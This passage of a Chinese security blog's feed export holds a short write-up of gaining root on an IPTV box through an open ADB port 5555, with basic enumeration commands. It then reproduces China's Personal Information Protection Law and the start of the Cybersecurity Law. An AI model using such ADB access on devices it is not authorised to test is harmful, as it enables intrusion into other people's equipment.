    <summary type="html">&lt;h3 id=&quot;AVScan-杀毒软件识别工具&quot;&gt;&lt;a href=&quot;#AVScan-杀毒软件识别工具&quot; class=&quot;headerlink&quot; title=&quot;AVScan: 杀毒软件识别工具&quot;&gt;&lt;/a&gt;AVScan: 杀毒软件识别工具&lt;/h3&gt;&lt;h4 id=&quot;概述&quot;&gt;&lt;a href</summary>
      
    
    
    
    <category term="Code" scheme="http://example.com/categories/Code/"/>
    
    
    <category term="安全工具" scheme="http://example.com/tags/%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7/"/>
    
    <category term="Code" scheme="http://example.com/tags/Code/"/>
    
  </entry>
  
  <entry>
    <title>记录一次5555端口渗透实战</title>
    <link href="http://example.com/2024/10/01/%E8%AE%B0%E5%BD%95%E4%B8%80%E6%AC%A15555%E7%AB%AF%E5%8F%A3%E6%B8%97%E9%80%8F%E5%AE%9E%E6%88%98/"/>
    <id>http://example.com/2024/10/01/%E8%AE%B0%E5%BD%95%E4%B8%80%E6%AC%A15555%E7%AB%AF%E5%8F%A3%E6%B8%97%E9%80%8F%E5%AE%9E%E6%88%98/</id>
    <published>2024-09-30T16:00:00.000Z</published>
    <updated>2025-07-25T18:07:43.987Z</updated>
    
    <content type="html"><![CDATA[<h1 id="记一次5555端口渗透实战"><a href="#记一次5555端口渗透实战" class="headerlink" title="记一次5555端口渗透实战"></a>记一次5555端口渗透实战</h1><p>关于因为在老家无聊没事扫描了一下内网设备，由于是老人一直在老家，所以宽带是我们省份接管了某动的宽带，使用我们本地接管了的IPTV设备上网。<br>使用Nmap扫了一下，发现只开启了5555端口，指纹显示是freeciv<br>百度一下看看…这…（心跳不由得加快了起来）</p><h2 id="ADB"><a href="#ADB" class="headerlink" title="ADB"></a>ADB</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Android Debug Bridge（安卓调试桥） tools。它就是一个命令行窗口，用于通过电脑端与模拟器或者是设备之间的交互。</span><br></pre></td></tr></table></figure><h2 id="开始"><a href="#开始" class="headerlink" title="开始"></a>开始</h2><h3 id="在kali中安装adb"><a href="#在kali中安装adb" class="headerlink" title="在kali中安装adb"></a>在kali中安装adb</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt install google-android-platform-tools-installer</span><br></pre></td></tr></table></figure><p>安装好以后我们就开始使用adb命令进行远程尝试</p><p><img src="/2024/10/01/%E8%AE%B0%E5%BD%95%E4%B8%80%E6%AC%A15555%E7%AB%AF%E5%8F%A3%E6%B8%97%E9%80%8F%E5%AE%9E%E6%88%98/1737386849219.png" alt="1737386849219"></p><p>没想到竟然是直接获取到了root权限</p><p>由于这只是一台电视盒子，并没有什么其他的功能，以至于还不知道这个还能干什么，就简简单单查看一下设备信息</p><p>设备应用列表</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pm list packages -3</span><br></pre></td></tr></table></figure><p><img src="/2024/10/01/%E8%AE%B0%E5%BD%95%E4%B8%80%E6%AC%A15555%E7%AB%AF%E5%8F%A3%E6%B8%97%E9%80%8F%E5%AE%9E%E6%88%98/3186615779.png" alt="m3x55eqx.png"></p><p>查看设备节点内存</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">adb shell df</span><br></pre></td></tr></table></figure><p><img src="/2024/10/01/%E8%AE%B0%E5%BD%95%E4%B8%80%E6%AC%A15555%E7%AB%AF%E5%8F%A3%E6%B8%97%E9%80%8F%E5%AE%9E%E6%88%98/2899797041.png" alt="m3x55ipc.png"></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;记一次5555端口渗透实战&quot;&gt;&lt;a href=&quot;#记一次5555端口渗透实战&quot; class=&quot;headerlink&quot; title=&quot;记一次5555端口渗透实战&quot;&gt;&lt;/a&gt;记一次5555端口渗透实战&lt;/h1&gt;&lt;p&gt;关于因为在老家无聊没事扫描了一下内网设备，由于是老人</summary>
      
    
    
    
    <category term="内网" scheme="http://example.com/categories/%E5%86%85%E7%BD%91/"/>
    
    
    <category term="随笔" scheme="http://example.com/tags/%E9%9A%8F%E7%AC%94/"/>
    
  </entry>
  
  <entry>
    <title>中华人民共和国个人信息保护法</title>
    <link href="http://example.com/2024/09/04/%E4%B8%AD%E5%8D%8E%E4%BA%BA%E6%B0%91%E5%85%B1%E5%92%8C%E5%9B%BD%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF%E4%BF%9D%E6%8A%A4%E6%B3%95/"/>
    <id>http://example.com/2024/09/04/%E4%B8%AD%E5%8D%8E%E4%BA%BA%E6%B0%91%E5%85%B1%E5%92%8C%E5%9B%BD%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF%E4%BF%9D%E6%8A%A4%E6%B3%95/</id>
    <published>2024-09-03T16:00:00.000Z</published>
    <updated>2025-02-09T14:02:46.787Z</updated>
    
    <content type="html"><![CDATA[<p><strong>（2021年8月20日第十三届全国人民代表大会常务委员会第三十次会议通过）</strong><br><img src="/2024/09/04/%E4%B8%AD%E5%8D%8E%E4%BA%BA%E6%B0%91%E5%85%B1%E5%92%8C%E5%9B%BD%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF%E4%BF%9D%E6%8A%A4%E6%B3%95/1088265057.png" alt="m3x5t3ci.png"></p><p>目 录</p><p>第一章 总 则</p><p>第二章 个人信息处理规则</p><p>第一节 一般规定</p><p>第二节 敏感个人信息的处理规则</p><p>第三节 国家机关处理个人信息的特别规定</p><p>第三章 个人信息跨境提供的规则</p><p>第四章 个人在个人信息处理活动中的权利</p><p>第五章 个人信息处理者的义务</p><p>第六章 履行个人信息保护职责的部门</p><p>第七章 法律责任</p><p>第八章 附 则</p><h2 id="第一章-总-则"><a href="#第一章-总-则" class="headerlink" title="第一章 总 则"></a><strong>第一章 总 则</strong></h2><p>第一条 为了保护个人信息权益，规范个人信息处理活动，促进个人信息合理利用，根据宪法，制定本法。</p><p>第二条 自然人的个人信息受法律保护，任何组织、个人不得侵害自然人的个人信息权益。</p><p>第三条 在中华人民共和国境内处理自然人个人信息的活动，适用本法。</p><p>在中华人民共和国境外处理中华人民共和国境内自然人个人信息的活动，有下列情形之一的，也适用本法：</p><p>（一）以向境内自然人提供产品或者服务为目的；</p><p>（二）分析、评估境内自然人的行为；</p><p>（三）法律、行政法规规定的其他情形。</p><p>第四条 个人信息是以电子或者其他方式记录的与已识别或者可识别的自然人有关的各种信息，不包括匿名化处理后的信息。</p><p>个人信息的处理包括个人信息的收集、存储、使用、加工、传输、提供、公开、删除等。</p><p>第五条 处理个人信息应当遵循合法、正当、必要和诚信原则，不得通过误导、欺诈、胁迫等方式处理个人信息。</p><p>第六条 处理个人信息应当具有明确、合理的目的，并应当与处理目的直接相关，采取对个人权益影响最小的方式。</p><p>收集个人信息，应当限于实现处理目的的最小范围，不得过度收集个人信息。</p><p>第七条 处理个人信息应当遵循公开、透明原则，公开个人信息处理规则，明示处理的目的、方式和范围。</p><p>第八条 处理个人信息应当保证个人信息的质量，避免因个人信息不准确、不完整对个人权益造成不利影响。</p><p>第九条 个人信息处理者应当对其个人信息处理活动负责，并采取必要措施保障所处理的个人信息的安全。</p><p>第十条 任何组织、个人不得非法收集、使用、加工、传输他人个人信息，不得非法买卖、提供或者公开他人个人信息；不得从事危害国家安全、公共利益的个人信息处理活动。</p><p>第十一条 国家建立健全个人信息保护制度，预防和惩治侵害个人信息权益的行为，加强个人信息保护宣传教育，推动形成政府、企业、相关社会组织、公众共同参与个人信息保护的良好环境。</p><p>第十二条 国家积极参与个人信息保护国际规则的制定，促进个人信息保护方面的国际交流与合作，推动与其他国家、地区、国际组织之间的个人信息保护规则、标准等互认。</p><h2 id="第二章-个人信息处理规则"><a href="#第二章-个人信息处理规则" class="headerlink" title="第二章 个人信息处理规则"></a><strong>第二章 个人信息处理规则</strong></h2><p>第一节 一般规定</p><p>第十三条 符合下列情形之一的，个人信息处理者方可处理个人信息：</p><p>（一）取得个人的同意；</p><p>（二）为订立、履行个人作为一方当事人的合同所必需，或者按照依法制定的劳动规章制度和依法签订的集体合同实施人力资源管理所必需；</p><p>（三）为履行法定职责或者法定义务所必需；</p><p>（四）为应对突发公共卫生事件，或者紧急情况下为保护自然人的生命健康和财产安全所必需；</p><p>（五）为公共利益实施新闻报道、舆论监督等行为，在合理的范围内处理个人信息；</p><p>（六）依照本法规定在合理的范围内处理个人自行公开或者其他已经合法公开的个人信息；</p><p>（七）法律、行政法规规定的其他情形。</p><p>依照本法其他有关规定，处理个人信息应当取得个人同意，但是有前款第二项至第七项规定情形的，不需取得个人同意。</p><p>第十四条 基于个人同意处理个人信息的，该同意应当由个人在充分知情的前提下自愿、明确作出。法律、行政法规规定处理个人信息应当取得个人单独同意或者书面同意的，从其规定。</p><p>个人信息的处理目的、处理方式和处理的个人信息种类发生变更的，应当重新取得个人同意。</p><p>第十五条 基于个人同意处理个人信息的，个人有权撤回其同意。个人信息处理者应当提供便捷的撤回同意的方式。</p><p>个人撤回同意，不影响撤回前基于个人同意已进行的个人信息处理活动的效力。</p><p>第十六条 个人信息处理者不得以个人不同意处理其个人信息或者撤回同意为由，拒绝提供产品或者服务；处理个人信息属于提供产品或者服务所必需的除外。</p><p>第十七条 个人信息处理者在处理个人信息前，应当以显著方式、清晰易懂的语言真实、准确、完整地向个人告知下列事项：</p><p>（一）个人信息处理者的名称或者姓名和联系方式；</p><p>（二）个人信息的处理目的、处理方式，处理的个人信息种类、保存期限；</p><p>（三）个人行使本法规定权利的方式和程序；</p><p>（四）法律、行政法规规定应当告知的其他事项。</p><p>前款规定事项发生变更的，应当将变更部分告知个人。</p><p>个人信息处理者通过制定个人信息处理规则的方式告知第一款规定事项的，处理规则应当公开，并且便于查阅和保存。</p><p>第十八条 个人信息处理者处理个人信息，有法律、行政法规规定应当保密或者不需要告知的情形的，可以不向个人告知前条第一款规定的事项。</p><p>紧急情况下为保护自然人的生命健康和财产安全无法及时向个人告知的，个人信息处理者应当在紧急情况消除后及时告知。</p><p>第十九条 除法律、行政法规另有规定外，个人信息的保存期限应当为实现处理目的所必要的最短时间。</p><p>第二十条 两个以上的个人信息处理者共同决定个人信息的处理目的和处理方式的，应当约定各自的权利和义务。但是，该约定不影响个人向其中任何一个个人信息处理者要求行使本法规定的权利。</p><p>个人信息处理者共同处理个人信息，侵害个人信息权益造成损害的，应当依法承担连带责任。</p><p>第二十一条 个人信息处理者委托处理个人信息的，应当与受托人约定委托处理的目的、期限、处理方式、个人信息的种类、保护措施以及双方的权利和义务等，并对受托人的个人信息处理活动进行监督。</p><p>受托人应当按照约定处理个人信息，不得超出约定的处理目的、处理方式等处理个人信息；委托合同不生效、无效、被撤销或者终止的，受托人应当将个人信息返还个人信息处理者或者予以删除，不得保留。</p><p>未经个人信息处理者同意，受托人不得转委托他人处理个人信息。</p><p>第二十二条 个人信息处理者因合并、分立、解散、被宣告破产等原因需要转移个人信息的，应当向个人告知接收方的名称或者姓名和联系方式。接收方应当继续履行个人信息处理者的义务。接收方变更原先的处理目的、处理方式的，应当依照本法规定重新取得个人同意。</p><p>第二十三条 个人信息处理者向其他个人信息处理者提供其处理的个人信息的，应当向个人告知接收方的名称或者姓名、联系方式、处理目的、处理方式和个人信息的种类，并取得个人的单独同意。接收方应当在上述处理目的、处理方式和个人信息的种类等范围内处理个人信息。接收方变更原先的处理目的、处理方式的，应当依照本法规定重新取得个人同意。</p><p>第二十四条 个人信息处理者利用个人信息进行自动化决策，应当保证决策的透明度和结果公平、公正，不得对个人在交易价格等交易条件上实行不合理的差别待遇。</p><p>通过自动化决策方式向个人进行信息推送、商业营销，应当同时提供不针对其个人特征的选项，或者向个人提供便捷的拒绝方式。</p><p>通过自动化决策方式作出对个人权益有重大影响的决定，个人有权要求个人信息处理者予以说明，并有权拒绝个人信息处理者仅通过自动化决策的方式作出决定。</p><p>第二十五条 个人信息处理者不得公开其处理的个人信息，取得个人单独同意的除外。</p><p>第二十六条 在公共场所安装图像采集、个人身份识别设备，应当为维护公共安全所必需，遵守国家有关规定，并设置显著的提示标识。所收集的个人图像、身份识别信息只能用于维护公共安全的目的，不得用于其他目的；取得个人单独同意的除外。</p><p>第二十七条 个人信息处理者可以在合理的范围内处理个人自行公开或者其他已经合法公开的个人信息；个人明确拒绝的除外。个人信息处理者处理已公开的个人信息，对个人权益有重大影响的，应当依照本法规定取得个人同意。</p><p>第二节  敏感个人信息的处理规则</p><p>第二十八条 敏感个人信息是一旦泄露或者非法使用，容易导致自然人的人格尊严受到侵害或者人身、财产安全受到危害的个人信息，包括生物识别、宗教信仰、特定身份、医疗健康、金融账户、行踪轨迹等信息，以及不满十四周岁未成年人的个人信息。</p><p>只有在具有特定的目的和充分的必要性，并采取严格保护措施的情形下，个人信息处理者方可处理敏感个人信息。</p><p>第二十九条 处理敏感个人信息应当取得个人的单独同意；法律、行政法规规定处理敏感个人信息应当取得书面同意的，从其规定。</p><p>第三十条 个人信息处理者处理敏感个人信息的，除本法第十七条第一款规定的事项外，还应当向个人告知处理敏感个人信息的必要性以及对个人权益的影响；依照本法规定可以不向个人告知的除外。</p><p>第三十一条 个人信息处理者处理不满十四周岁未成年人个人信息的，应当取得未成年人的父母或者其他监护人的同意。</p><p>个人信息处理者处理不满十四周岁未成年人个人信息的，应当制定专门的个人信息处理规则。</p><p>第三十二条 法律、行政法规对处理敏感个人信息规定应当取得相关行政许可或者作出其他限制的，从其规定。</p><p>第三节 国家机关处理个人信息的特别规定</p><p>第三十三条 国家机关处理个人信息的活动，适用本法；本节有特别规定的，适用本节规定。</p><p>第三十四条 国家机关为履行法定职责处理个人信息，应当依照法律、行政法规规定的权限、程序进行，不得超出履行法定职责所必需的范围和限度。</p><p>第三十五条 国家机关为履行法定职责处理个人信息，应当依照本法规定履行告知义务；有本法第十八条第一款规定的情形，或者告知将妨碍国家机关履行法定职责的除外。</p><p>第三十六条 国家机关处理的个人信息应当在中华人民共和国境内存储；确需向境外提供的，应当进行安全评估。安全评估可以要求有关部门提供支持与协助。</p><p>第三十七条 法律、法规授权的具有管理公共事务职能的组织为履行法定职责处理个人信息，适用本法关于国家机关处理个人信息的规定。</p><h2 id="第三章-个人信息跨境提供的规则"><a href="#第三章-个人信息跨境提供的规则" class="headerlink" title="第三章 个人信息跨境提供的规则"></a><strong>第三章 个人信息跨境提供的规则</strong></h2><p>第三十八条 个人信息处理者因业务等需要，确需向中华人民共和国境外提供个人信息的，应当具备下列条件之一：</p><p>（一）依照本法第四十条的规定通过国家网信部门组织的安全评估；</p><p>（二）按照国家网信部门的规定经专业机构进行个人信息保护认证；</p><p>（三）按照国家网信部门制定的标准合同与境外接收方订立合同，约定双方的权利和义务；</p><p>（四）法律、行政法规或者国家网信部门规定的其他条件。</p><p>中华人民共和国缔结或者参加的国际条约、协定对向中华人民共和国境外提供个人信息的条件等有规定的，可以按照其规定执行。</p><p>个人信息处理者应当采取必要措施，保障境外接收方处理个人信息的活动达到本法规定的个人信息保护标准。</p><p>第三十九条 个人信息处理者向中华人民共和国境外提供个人信息的，应当向个人告知境外接收方的名称或者姓名、联系方式、处理目的、处理方式、个人信息的种类以及个人向境外接收方行使本法规定权利的方式和程序等事项，并取得个人的单独同意。</p><p>第四十条 关键信息基础设施运营者和处理个人信息达到国家网信部门规定数量的个人信息处理者，应当将在中华人民共和国境内收集和产生的个人信息存储在境内。确需向境外提供的，应当通过国家网信部门组织的安全评估；法律、行政法规和国家网信部门规定可以不进行安全评估的，从其规定。</p><p>第四十一条 中华人民共和国主管机关根据有关法律和中华人民共和国缔结或者参加的国际条约、协定，或者按照平等互惠原则，处理外国司法或者执法机构关于提供存储于境内个人信息的请求。非经中华人民共和国主管机关批准，个人信息处理者不得向外国司法或者执法机构提供存储于中华人民共和国境内的个人信息。</p><p>第四十二条 境外的组织、个人从事侵害中华人民共和国公民的个人信息权益，或者危害中华人民共和国国家安全、公共利益的个人信息处理活动的，国家网信部门可以将其列入限制或者禁止个人信息提供清单，予以公告，并采取限制或者禁止向其提供个人信息等措施。</p><p>第四十三条 任何国家或者地区在个人信息保护方面对中华人民共和国采取歧视性的禁止、限制或者其他类似措施的，中华人民共和国可以根据实际情况对该国家或者地区对等采取措施。</p><h2 id="第四章-个人在个人信息处理活动中的权利"><a href="#第四章-个人在个人信息处理活动中的权利" class="headerlink" title="第四章 个人在个人信息处理活动中的权利"></a><strong>第四章 个人在个人信息处理活动中的权利</strong></h2><p>第四十四条 个人对其个人信息的处理享有知情权、决定权，有权限制或者拒绝他人对其个人信息进行处理；法律、行政法规另有规定的除外。</p><p>第四十五条 个人有权向个人信息处理者查阅、复制其个人信息；有本法第十八条第一款、第三十五条规定情形的除外。</p><p>个人请求查阅、复制其个人信息的，个人信息处理者应当及时提供。</p><p>个人请求将个人信息转移至其指定的个人信息处理者，符合国家网信部门规定条件的，个人信息处理者应当提供转移的途径。</p><p>第四十六条 个人发现其个人信息不准确或者不完整的，有权请求个人信息处理者更正、补充。</p><p>个人请求更正、补充其个人信息的，个人信息处理者应当对其个人信息予以核实，并及时更正、补充。</p><p>第四十七条 有下列情形之一的，个人信息处理者应当主动删除个人信息；个人信息处理者未删除的，个人有权请求删除：</p><p>（一）处理目的已实现、无法实现或者为实现处理目的不再必要；</p><p>（二）个人信息处理者停止提供产品或者服务，或者保存期限已届满；</p><p>（三）个人撤回同意；</p><p>（四）个人信息处理者违反法律、行政法规或者违反约定处理个人信息；</p><p>（五）法律、行政法规规定的其他情形。</p><p>法律、行政法规规定的保存期限未届满，或者删除个人信息从技术上难以实现的，个人信息处理者应当停止除存储和采取必要的安全保护措施之外的处理。</p><p>第四十八条 个人有权要求个人信息处理者对其个人信息处理规则进行解释说明。</p><p>第四十九条 自然人死亡的，其近亲属为了自身的合法、正当利益，可以对死者的相关个人信息行使本章规定的查阅、复制、更正、删除等权利；死者生前另有安排的除外。</p><p>第五十条 个人信息处理者应当建立便捷的个人行使权利的申请受理和处理机制。拒绝个人行使权利的请求的，应当说明理由。</p><p>个人信息处理者拒绝个人行使权利的请求的，个人可以依法向人民法院提起诉讼。</p><h2 id="第五章-个人信息处理者的义务"><a href="#第五章-个人信息处理者的义务" class="headerlink" title="第五章 个人信息处理者的义务"></a><strong>第五章 个人信息处理者的义务</strong></h2><p>第五十一条 个人信息处理者应当根据个人信息的处理目的、处理方式、个人信息的种类以及对个人权益的影响、可能存在的安全风险等，采取下列措施确保个人信息处理活动符合法律、行政法规的规定，并防止未经授权的访问以及个人信息泄露、篡改、丢失：</p><p>（一）制定内部管理制度和操作规程；</p><p>（二）对个人信息实行分类管理；</p><p>（三）采取相应的加密、去标识化等安全技术措施；</p><p>（四）合理确定个人信息处理的操作权限，并定期对从业人员进行安全教育和培训；</p><p>（五）制定并组织实施个人信息安全事件应急预案；</p><p>（六）法律、行政法规规定的其他措施。</p><p>第五十二条 处理个人信息达到国家网信部门规定数量的个人信息处理者应当指定个人信息保护负责人，负责对个人信息处理活动以及采取的保护措施等进行监督。</p><p>个人信息处理者应当公开个人信息保护负责人的联系方式，并将个人信息保护负责人的姓名、联系方式等报送履行个人信息保护职责的部门。</p><p>第五十三条 本法第三条第二款规定的中华人民共和国境外的个人信息处理者，应当在中华人民共和国境内设立专门机构或者指定代表，负责处理个人信息保护相关事务，并将有关机构的名称或者代表的姓名、联系方式等报送履行个人信息保护职责的部门。</p><p>第五十四条 个人信息处理者应当定期对其处理个人信息遵守法律、行政法规的情况进行合规审计。</p><p>第五十五条 有下列情形之一的，个人信息处理者应当事前进行个人信息保护影响评估，并对处理情况进行记录：</p><p>（一）处理敏感个人信息；</p><p>（二）利用个人信息进行自动化决策；</p><p>（三）委托处理个人信息、向其他个人信息处理者提供个人信息、公开个人信息；</p><p>（四）向境外提供个人信息；</p><p>（五）其他对个人权益有重大影响的个人信息处理活动。</p><p>第五十六条 个人信息保护影响评估应当包括下列内容：</p><p>（一）个人信息的处理目的、处理方式等是否合法、正当、必要；</p><p>（二）对个人权益的影响及安全风险；</p><p>（三）所采取的保护措施是否合法、有效并与风险程度相适应。</p><p>个人信息保护影响评估报告和处理情况记录应当至少保存三年。</p><p>第五十七条 发生或者可能发生个人信息泄露、篡改、丢失的，个人信息处理者应当立即采取补救措施，并通知履行个人信息保护职责的部门和个人。通知应当包括下列事项：</p><p>（一）发生或者可能发生个人信息泄露、篡改、丢失的信息种类、原因和可能造成的危害；</p><p>（二）个人信息处理者采取的补救措施和个人可以采取的减轻危害的措施；</p><p>（三）个人信息处理者的联系方式。</p><p>个人信息处理者采取措施能够有效避免信息泄露、篡改、丢失造成危害的，个人信息处理者可以不通知个人；履行个人信息保护职责的部门认为可能造成危害的，有权要求个人信息处理者通知个人。</p><p>第五十八条 提供重要互联网平台服务、用户数量巨大、业务类型复杂的个人信息处理者，应当履行下列义务：</p><p>（一）按照国家规定建立健全个人信息保护合规制度体系，成立主要由外部成员组成的独立机构对个人信息保护情况进行监督；</p><p>（二）遵循公开、公平、公正的原则，制定平台规则，明确平台内产品或者服务提供者处理个人信息的规范和保护个人信息的义务；</p><p>（三）对严重违反法律、行政法规处理个人信息的平台内的产品或者服务提供者，停止提供服务；</p><p>（四）定期发布个人信息保护社会责任报告，接受社会监督。</p><p>第五十九条 接受委托处理个人信息的受托人，应当依照本法和有关法律、行政法规的规定，采取必要措施保障所处理的个人信息的安全，并协助个人信息处理者履行本法规定的义务。</p><h2 id="第六章-履行个人信息保护职责的部门"><a href="#第六章-履行个人信息保护职责的部门" class="headerlink" title="第六章 履行个人信息保护职责的部门"></a><strong>第六章 履行个人信息保护职责的部门</strong></h2><p>第六十条 国家网信部门负责统筹协调个人信息保护工作和相关监督管理工作。国务院有关部门依照本法和有关法律、行政法规的规定，在各自职责范围内负责个人信息保护和监督管理工作。</p><p>县级以上地方人民政府有关部门的个人信息保护和监督管理职责，按照国家有关规定确定。</p><p>前两款规定的部门统称为履行个人信息保护职责的部门。</p><p>第六十一条 履行个人信息保护职责的部门履行下列个人信息保护职责：</p><p>（一）开展个人信息保护宣传教育，指导、监督个人信息处理者开展个人信息保护工作；</p><p>（二）接受、处理与个人信息保护有关的投诉、举报；</p><p>（三）组织对应用程序等个人信息保护情况进行测评，并公布测评结果；</p><p>（四）调查、处理违法个人信息处理活动；</p><p>（五）法律、行政法规规定的其他职责。</p><p>第六十二条 国家网信部门统筹协调有关部门依据本法推进下列个人信息保护工作：</p><p>（一）制定个人信息保护具体规则、标准；</p><p>（二）针对小型个人信息处理者、处理敏感个人信息以及人脸识别、人工智能等新技术、新应用，制定专门的个人信息保护规则、标准；</p><p>（三）支持研究开发和推广应用安全、方便的电子身份认证技术，推进网络身份认证公共服务建设；</p><p>（四）推进个人信息保护社会化服务体系建设，支持有关机构开展个人信息保护评估、认证服务；</p><p>（五）完善个人信息保护投诉、举报工作机制。</p><p>第六十三条 履行个人信息保护职责的部门履行个人信息保护职责，可以采取下列措施：</p><p>（一）询问有关当事人，调查与个人信息处理活动有关的情况；</p><p>（二）查阅、复制当事人与个人信息处理活动有关的合同、记录、账簿以及其他有关资料；</p><p>（三）实施现场检查，对涉嫌违法的个人信息处理活动进行调查；</p><p>（四）检查与个人信息处理活动有关的设备、物品；对有证据证明是用于违法个人信息处理活动的设备、物品，向本部门主要负责人书面报告并经批准，可以查封或者扣押。</p><p>履行个人信息保护职责的部门依法履行职责，当事人应当予以协助、配合，不得拒绝、阻挠。</p><p>第六十四条 履行个人信息保护职责的部门在履行职责中，发现个人信息处理活动存在较大风险或者发生个人信息安全事件的，可以按照规定的权限和程序对该个人信息处理者的法定代表人或者主要负责人进行约谈，或者要求个人信息处理者委托专业机构对其个人信息处理活动进行合规审计。个人信息处理者应当按照要求采取措施，进行整改，消除隐患。</p><p>履行个人信息保护职责的部门在履行职责中，发现违法处理个人信息涉嫌犯罪的，应当及时移送公安机关依法处理。</p><p>第六十五条 任何组织、个人有权对违法个人信息处理活动向履行个人信息保护职责的部门进行投诉、举报。收到投诉、举报的部门应当依法及时处理，并将处理结果告知投诉、举报人。</p><p>履行个人信息保护职责的部门应当公布接受投诉、举报的联系方式。</p><h2 id="第七章-法律责任"><a href="#第七章-法律责任" class="headerlink" title="第七章 法律责任"></a><strong>第七章 法律责任</strong></h2><p>第六十六条 违反本法规定处理个人信息，或者处理个人信息未履行本法规定的个人信息保护义务的，由履行个人信息保护职责的部门责令改正，给予警告，没收违法所得，对违法处理个人信息的应用程序，责令暂停或者终止提供服务；拒不改正的，并处一百万元以下罚款；对直接负责的主管人员和其他直接责任人员处一万元以上十万元以下罚款。</p><p>有前款规定的违法行为，情节严重的，由省级以上履行个人信息保护职责的部门责令改正，没收违法所得，并处五千万元以下或者上一年度营业额百分之五以下罚款，并可以责令暂停相关业务或者停业整顿、通报有关主管部门吊销相关业务许可或者吊销营业执照；对直接负责的主管人员和其他直接责任人员处十万元以上一百万元以下罚款，并可以决定禁止其在一定期限内担任相关企业的董事、监事、高级管理人员和个人信息保护负责人。</p><p>第六十七条 有本法规定的违法行为的，依照有关法律、行政法规的规定记入信用档案，并予以公示。</p><p>第六十八条 国家机关不履行本法规定的个人信息保护义务的，由其上级机关或者履行个人信息保护职责的部门责令改正；对直接负责的主管人员和其他直接责任人员依法给予处分。</p><p>履行个人信息保护职责的部门的工作人员玩忽职守、滥用职权、徇私舞弊，尚不构成犯罪的，依法给予处分。</p><p>第六十九条 处理个人信息侵害个人信息权益造成损害，个人信息处理者不能证明自己没有过错的，应当承担损害赔偿等侵权责任。</p><p>前款规定的损害赔偿责任按照个人因此受到的损失或者个人信息处理者因此获得的利益确定；个人因此受到的损失和个人信息处理者因此获得的利益难以确定的，根据实际情况确定赔偿数额。</p><p>第七十条 个人信息处理者违反本法规定处理个人信息，侵害众多个人的权益的，人民检察院、法律规定的消费者组织和由国家网信部门确定的组织可以依法向人民法院提起诉讼。</p><p>第七十一条 违反本法规定，构成违反治安管理行为的，依法给予治安管理处罚；构成犯罪的，依法追究刑事责任。</p><h2 id="第八章-附-则"><a href="#第八章-附-则" class="headerlink" title="第八章 附 则"></a><strong>第八章 附 则</strong></h2><p>第七十二条 自然人因个人或者家庭事务处理个人信息的，不适用本法。</p><p>法律对各级人民政府及其有关部门组织实施的统计、档案管理活动中的个人信息处理有规定的，适用其规定。</p><p>第七十三条 本法下列用语的含义：</p><p>（一）个人信息处理者，是指在个人信息处理活动中自主决定处理目的、处理方式的组织、个人。</p><p>（二）自动化决策，是指通过计算机程序自动分析、评估个人的行为习惯、兴趣爱好或者经济、健康、信用状况等，并进行决策的活动。</p><p>（三）去标识化，是指个人信息经过处理，使其在不借助额外信息的情况下无法识别特定自然人的过程。</p><p>（四）匿名化，是指个人信息经过处理无法识别特定自然人且不能复原的过程。</p><p>第七十四条 本法自2021年11月1日起施行。****</p>]]></content>
    
    
      
      
    <summary type="html">&lt;p&gt;&lt;strong&gt;（2021年8月20日第十三届全国人民代表大会常务委员会第三十次会议通过）&lt;/strong&gt;&lt;br&gt;&lt;img src=&quot;/2024/09/04/%E4%B8%AD%E5%8D%8E%E4%BA%BA%E6%B0%91%E5%85%B1%E5%92%8C%E5</summary>
      
    
    
    
    <category term="法律法规" scheme="http://example.com/categories/%E6%B3%95%E5%BE%8B%E6%B3%95%E8%A7%84/"/>
    
    
    <category term="中华人民共和国个人信息保护法" scheme="http://example.com/tags/%E4%B8%AD%E5%8D%8E%E4%BA%BA%E6%B0%91%E5%85%B1%E5%92%8C%E5%9B%BD%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF%E4%BF%9D%E6%8A%A4%E6%B3%95/"/>
    
    <category term="法律法规" scheme="http://example.com/tags/%E6%B3%95%E5%BE%8B%E6%B3%95%E8%A7%84/"/>
    
  </entry>
  
  <entry>
    <title>中华人民共和国网络安全法</title>
    <link href="http://example.com/2024/09/04/%E4%B8%AD%E5%8D%8E%E4%BA%BA%E6%B0%91%E5%85%B1%E5%92%8C%E5%9B%BD%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%B3%95/"/>
    <id>http://example.com/2024/09/04/%E4%B8%AD%E5%8D%8E%E4%BA%BA%E6%B0%91%E5%85%B1%E5%92%8C%E5%9B%BD%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%B3%95/</id>
    <published>2024-09-03T16:00:00.000Z</published>
    <updated>2025-02-09T14:04:02.152Z</updated>
    
    <content type="html"><![CDATA[<h1 id="中华人民共和国网络安全法"><a href="#中华人民共和国网络安全法" class="headerlink" title="中华人民共和国网络安全法"></a>中华人民共和国网络安全法</h1><p><strong>（2016年11月7日第十二届全国人民代表大会常务委员会第二十四次会议通过）</strong><br><img src="/2024/09/04/%E4%B8%AD%E5%8D%8E%E4%BA%BA%E6%B0%91%E5%85%B1%E5%92%8C%E5%9B%BD%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%B3%95/1584684870.png" alt="m3x5swbz.png"><br>目 录</p><p>第一章 总 则</p><p>第二章 网络安全支持与促进</p><p>第三章 网络运行安全</p><p>第一节 一般规定</p><p>第二节 关键信息基础设施的运行安全</p><p>第四章 网络信息安全</p><p>第五章 监测预警与应急处置</p><p>第六章 法律责任</p><p>第七章 附 则</p><h2 id="第一章-总-则"><a href="#第一章-总-则" class="headerlink" title="第一章 总 则"></a><strong>第一章 总 则</strong></h2><p>第一条 为了保障网络安全，维护网络空间主权和国家安全、社会公共利益，保护公民、法人和其他组织的合法权益，促进经济社会信息化健康发展，制定本法。</p><p>第二条 